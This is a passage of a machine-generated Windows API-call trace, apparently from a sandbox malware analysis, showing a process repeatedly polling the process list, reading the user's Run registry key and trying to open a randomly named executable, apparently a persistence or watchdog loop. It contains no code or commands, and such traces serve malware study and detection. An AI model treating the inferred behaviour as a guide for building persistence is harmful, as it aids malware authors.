BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.722] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.733] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.733] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.733] NtClose (Handle=0x14c) returned 0x0 [0176.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.733] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.733] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.734] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.734] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.734] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.737] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.752] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.752] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.752] NtClose (Handle=0x14c) returned 0x0 [0176.752] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.753] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.753] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.753] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.753] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.753] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.756] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.766] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.766] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.766] NtClose (Handle=0x14c) returned 0x0 [0176.766] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.766] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.767] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.767] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.767] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.767] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.770] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.782] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.782] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.782] NtClose (Handle=0x14c) returned 0x0 [0176.783] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.783] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.783] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.783] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.783] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.783] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.786] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.813] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.813] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.813] NtClose (Handle=0x14c) returned 0x0 [0176.813] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.813] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.813] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.813] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.813] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.814] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.860] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.860] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.860] NtClose (Handle=0x14c) returned 0x0 [0176.860] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.860] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.860] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.860] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.860] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.861] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.864] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.892] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.892] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.893] NtClose (Handle=0x14c) returned 0x0 [0176.893] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.893] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.893] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.893] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.893] NtCreateFile (in: FileHandle=0x14e62c, 